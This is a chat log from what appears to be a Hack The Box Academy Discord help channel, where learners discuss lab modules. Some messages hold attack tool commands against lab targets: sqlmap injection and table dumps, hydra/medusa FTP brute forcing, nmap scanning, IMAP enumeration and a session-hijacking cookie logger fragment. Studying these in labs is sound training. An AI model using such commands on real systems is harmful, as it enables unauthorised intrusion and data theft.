case 9,
sqlmap -u โ€œhttp://206.189.114.209:30142/case9.php?id=1*&uid=1842984375โ€ --randomize=uid --batch -v 5 --tables --dump | grep URI

case 11, I tried a bunch of others, all of them doesnt seem to work.
sqlmap -u โ€œhttp://165.227.225.180:32243/case11.phpโ€ --data=โ€˜id=1โ€™ --tamper=apostrophemask,greater --batch --tables

Thank youโ€ฆ

fathom pendant
gusty gate
#

I am stuck with the command injection chapter > Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found, I think I'm almost there but can I share through dm the command what I'm doing? appreciate your help

autumn pilot
#

start with a simple command, and then build on top of it

karmic lagoon
#

I am working through a test via HTB and the vms can only handle 1 request at a time before the VM fails and needs to be restarted. Is there a fix for this?

fathom pendant
karmic lagoon
#

It's an onboarding test.

#

Which is fine, but I feel like something is misconfigured because I have reset the vm after each request

fathom pendant
#

That doesn't help us figure out what you're talking about

#

You may need to reach out to support on the site

karmic lagoon
#

thanks!

fathom pendant
#

Is it related to an academy module?

karmic lagoon
#

I'm not sure exactly. HTB hosts their onboarding technical tests.

#

they call it a "lab assessment"

fallow delta
#

Hey has anyone recently completed "Attacking Common Service" SMB section? Think I mightve missed something as far as password attacking the service for one of the users

fathom pendant
#

<@&861185840277487616> ? Is this allowed

fathom pendant
#

Also this lab does have a user and PW list to download

#

Well the module itself

odd notch
fathom pendant
#

The footprinting section tells you it'll be on an IMAP server

#

:)

#

I also provided links below that to some useful IMAP commands to grab and read the email

#

Because if you don't do a specific one (or ones) all you'll get is "nil" in a bunch of places

winged hedge
fathom pendant
#

I redid this module challenging myself to only use CMD line and not a GUI client

odd notch
#

I figured it will be on the imap because pop3 can only send recive and delete... very little querying available(beside list and stat maybe..)

fathom pendant
#

Sometimes pop3 may have something

odd notch
#

Well yea. still... What is the logical follow though from the section to solve the question?

fathom pendant
#

Sign in with the given credentials on IMAP

fallow delta
fathom pendant
#

Use IMAP enumeration

odd notch
#

I have

fathom pendant
odd notch
fathom pendant
#

Use IMAP commands to find the answer from the footprinting IMAP/pop3 section :)

#

They gave you some starter commands

#

But the one that they give you for reading an email isn't quite correct

odd notch
#

I am ๐Ÿ˜ฆ

#

I can't seem to find the user

fathom pendant
#

? You're given the username/password to login with

odd notch
#

yes

#

I have logged in

#

but that isn't the answer... I assume I need to find a diff email

#

so... it will be something like poor_admin@inlanefreight.htb

#

Oh wait.. I see the select command

#

lemme fizzle with it

fathom pendant
#

No it's that email like I said though: #modules message these links will be more helpful

tender lake
fathom pendant
odd notch
#

Can I DM?

fallow delta
odd notch
#

Ok so it says there is 1 existing in || DEV.DEPARTMENT.INT || but I see no way to list email ID's?

fathom pendant
#

Well... If there's 1 wouldn't it make sense for it to be the first one?

#

IDs aren't some complex thing :D

odd notch
#

I tried 1 and 2...

fathom pendant
#

DM me what you got for fetching 1

odd notch
#

wait it gave me something now...

#

odd

#

I'mma try on my own but something is funky with this ๐Ÿ˜›

#

got it

#

huh

fathom pendant
#

I take it you hit the "nil" part

odd notch
#

ye

#

now learning to read emails

#

I think I remember something

fathom pendant
#

Take a look at the links I posted earlier

odd notch
#

I rather stick to the section... there will be enough time for exploring on my own later with boxes and stuff.

#

unless the answer is not in the section?

fathom pendant
#

And move to using an email client instead

odd notch
#

I see... that's a big oof then

fathom pendant
#

Yeah the fetch all command really doesn't do much for you

frank nest
#

Guys whenever i try to ping the machines I cant seem to get a connection. But any Starting point machine i have no issue connecting to. I am using VIP+ aswell so not sure why nothing is working when i am paying 20 USD. Any help?

fathom pendant
#

are you using your vip vpn config file to connect? because starting-point, regular, and academy vpns are all different

#

also please note that this would not be the place to ask about that, please refer to #rules and #welcome if you are confused about where to be (please note, if it hasn't been updated, that instead of ++verify it is now /verify)

odd notch
#

I found the flag... adding 1 or 2 paragraphs to the section would have saved me 20m

fathom pendant
#

or just providing the useful command in the imap commands part to begin with :D

frank nest
fathom pendant
#

seasonal is separate as well

odd notch
#

or just change the FETCH command listing to || 1 fetch <id> <email_format>

fathom pendant
#

but again this is NOT the place to ask

frank nest
#

Do you recommend I use Pwnbox better?

fathom pendant
#

refer to #welcome on how to verify your account to have access to more parts of the server

fathom pendant
odd notch
#

ye still

#

how do use that command would help most folks

fallow delta
#

Cool if I dm ya @fathom pendant ?

fathom pendant
#

i don't recall needing to enum a user for that section but I'm also slowly updating notes and moving forward with other modules

fathom pendant
#

All good if you do get stuck go ahead and DM me just ping me here when you do I don't get blind DM pings

#

The Attacking Common Services module I would say is one of the ones you can mostly follow examples with a few tweaks

fallow delta
#

yeah I'm thinking my R* might not be working right because I've got it running but no inbound cnx

fathom pendant
#

Just follow the steps directly

rotund urchin
#

Can someone assit me in the Active Subdomain Enumeration module and finding the NS? I treid all the tools in the section but not getting it.

naive field
#

is it possible to speed up medusa for ftp cracking?

#

its taking hella long

#

like 5sec per one try ๐Ÿ’€

#

and i have to crack user nd pw

#

on attacking common services ftp

#

now its like every 20sec

#

lol

fathom pendant
#

I just use hydra with -t 48

#

But tbh hydra does something similar it basically doubles the time each time it spits out progress

naive field
fathom pendant
#

you may need to reduce the threads then

naive field
rustic sage
#

I am redoing all of the enumeration, footprinting, and information gathering modules and taking notes on all of the exercises/skill assessments currently. As I am going through the Nmap module, I am wondering when you would use NSE in a situation outside of the module/the real world? Is it used throughout the exam?

fathom pendant
#

"45 targets did not resolve" means you were sending packets out faster than it could take them

#

i tend to go in multiples of 16 when adjusting

naive field
fathom pendant
naive field
#

or go even lower

fathom pendant
#

32

south aurora
#

can someone please help... this is for the session hijacking module.. not sure on what part im supposed to put the actual IP address in the index.php file for those. Can someone please share an example.
"Victim IP: {$_SERVER['REMOTE_ADDR']}

fathom pendant
#

Wait a sec @naive field I think I know which section that is and if I'm correct, try first just connecting to that 2121 port and see what the banner tells you - that may speed up your results

#

bc you don't need to log on to see a banner, just connect

static roost
rustic arrow
#

Anyone having issues with UDP services? I don't get any response from them.
You can test using the Footprint module, SNMP or IPMI sections
It works on pwnbox

fathom pendant
#

nvm @naive field wrong module i was thinking sorry but the username and password are in those lists

naive field
#

its still ongoing

#

i hope its not like in the last module i did

#

where for some reason i could not get the pw and user for no reason

fathom pendant
naive field
#

been 20min by now

fathom pendant
#

32 worked for me

fathom pendant
onyx rapids
#

Has anyone finished the final session puzzling exercise? I managed to change the admin password, but now it's asking for a 2fa code and I'm stumped

fallow delta
#

question on the SMB section, sorry @fathom pendant but still stuck on this. Did you have to revert a few times to get it to work? Got a tool listening but not seeing anything coming in even with null session

fathom pendant
#

give me one sec to look

fallow delta
#

rgr, appreciate it!! ๐Ÿ˜„

fathom pendant
#

it may also have something to do with rpc and creating shares

#

but I could absolutely be remembering this wrong and you just need to grab a couple things from the share and you're good

#

this one is fuzzy for me haven't come back and redone my notes in it

#

you can ask anyone else that's participating in it for help, but generally asking for outside help for active CTFs is disallowed

#

still not allowed

#

and still not the place for it

rotund urchin
#

lol

fathom pendant
#

if it's your hw then surely you should be able to complete it

errant lava
#

Just point him in the right direction at least in stead of just saying this isnโ€™t the place for it.

naive field
#

this is modules channel

fiery berry
naive field
#

๐Ÿคทโ€โ™‚๏ธ

#

cause it is

errant lava
#

Okay so where should he go then?

fiery berry
naive field
#

if its ur homework u can prob find

#

the answer online for it

#

i saw these type of challenges a lot

#

u can find a similar one and reverse the encryption urself

#

research is the key

#

if u dont know how to do it :D

errant lava
#

Itโ€™s not for me, itโ€™s his but he asked for help and I sent him to this discord because usually people are helpful here. Thank you ๐Ÿ™‚

onyx rapids
#

Ask chatgpt, why are you asking in HTB modules section how to do your homework ๐Ÿ˜‚

fallow delta
naive field
#

yeah, chatgpt can prob solve tihs easly

fathom pendant
#

this is why notes are important I'll Dm you what I did it has nothing to do with responder, sorry for leading you down a bad path @fallow delta

fallow delta
#

No worries!! Yeah we have read access to the share, but cant download the thing with the null session

fathom pendant
#

@odd notch community strings is a way for admins to access servers remotely. As stated it's fairly weak and doesn't enforce encryption due to it only being submitted in plaintext

#

the methods from that section will show you how to exploit a vulnerable snmp server if you follow the instructions

odd notch
#

ye it's just that it's worded oddly...

#

thanks ๐Ÿ‘

soft vortex
#

what is the best way to boot someone?

thorn urchin
#

this channel is for module discussion only

#

only

#

only

#

only

soft vortex
#

oh

thorn urchin
soft vortex
#

where can i discuss that?

thorn urchin
#

nowhere get lost

soft vortex
#

oh

#

just askin

thorn urchin
#

idc

fathom pendant
#

if it's a member causing issues dm a mod

thorn urchin
#

server is for professionals trying to learn, not for 12 yo skids

soft vortex
#

i was just asking a question no need to get aggressive

fathom pendant
#

there's a reason he's aggressive

thorn urchin
#

the question was dumb and reflects poorly on you

fathom pendant
#

we see this shit 24/7 in here

soft vortex
#

and i aint 12 btw

thorn urchin
#

like actually read em

#

immediately

soft vortex
#

ok chill man chill

fathom pendant
#

where it's obvious people don't read the #rules and #welcome and just look for the first active channel to try and talk in

thorn urchin
#

might actually start being nice if you can prove your reading comprehension is better than the avg loser that asks your kind of question

#

till then

soft vortex
#

what rules did i break tell me the number

thorn urchin
#

read it

#

christ

#

thanks for proving my assumption correct

soft vortex
#

i broke rule 9

#

i read everything

thorn urchin
#

bzzzt wrong

soft vortex
#

oh

#

but i did read everything

thorn urchin
#

doesnt matter, this channel is for module discussion only

#

so unless youre here to discuss modules

soft vortex
#

what channel is for reg chats

turbid hull
soft vortex
#

im just asking

thorn urchin
#

if you read everything youd know

soft vortex
#

im barely on discord or this server

#

so

thorn urchin
#

I linked both for a reason

soft vortex
#

so there is a chat where i can talk about that stuff

#

offtopic

#

wait

#

oh nvm

#

oh yeah dont worry about what i said

quiet musk
#

Hi all

#

anyone here that can help me with Attacking Common Services

#

attacking FTP

#

?

thorn urchin
quiet musk
#

I know the FTP number but but when I try to connect I get the message that the port is closed and in the nmap scan the port doesn't even appear

#

so just wanted to know if anyone had the same problem

thorn urchin
acoustic owl
fiery berry
quiet musk
#

well I answer the first question with the number and I says it's correct

#

scanned all ports

#

nmap -sC -sV -p- SERVER_IP

#

same command in the cheat sheet

round warren
#

@fiery sparrow can the Blacksky: Cloud Labs be used from the academy? Is it mandatory to be in a company for access it?

quiet musk
#

yeah

round warren
#

Thanks

thorn urchin
fathom pendant
#

Attacking Common Services FTP is spinning on an alternate port (but it's still considered a standard one in terms of alternates, much like 8080 for http)

thorn urchin
#

ye but he says he already got the port question correct

fathom pendant
#

also with the ftp command the syntax is simple ftp ip port

onyx rapids
#

Did you ever figure out how to bypass the MFA?

green birch
#

It's just frustrating when I don't know what to do because of the question and everything I try doesn't work. Isn't there a way to ask someone directly about the individual steps?

The question is "Apply what you learned in this section to grab the banner of the above server and submit it as the answer." But I don't know what this question mean. If I then want to try everything I've learned before, then some things don't work. Then I try to log in via ssh, but there comes an error message. I'm in the module Basic Tools from Getting Started.

Someone can help me?

thorn urchin
rustic sage
#

i cant find Bash in the top left section of the instance, where is it?

green birch
#

What mean "grab the banner of the above server"

rustic sage
green birch
#

I am German.

thorn urchin
#

server rules

vagrant gust
thorn urchin
rustic sage
woeful ermine
rustic sage
green birch
green birch
rustic sage
vagrant gust
#

its so satisfying getting the right answer after spending so long on it

fathom pendant
thorn urchin
green birch
quiet musk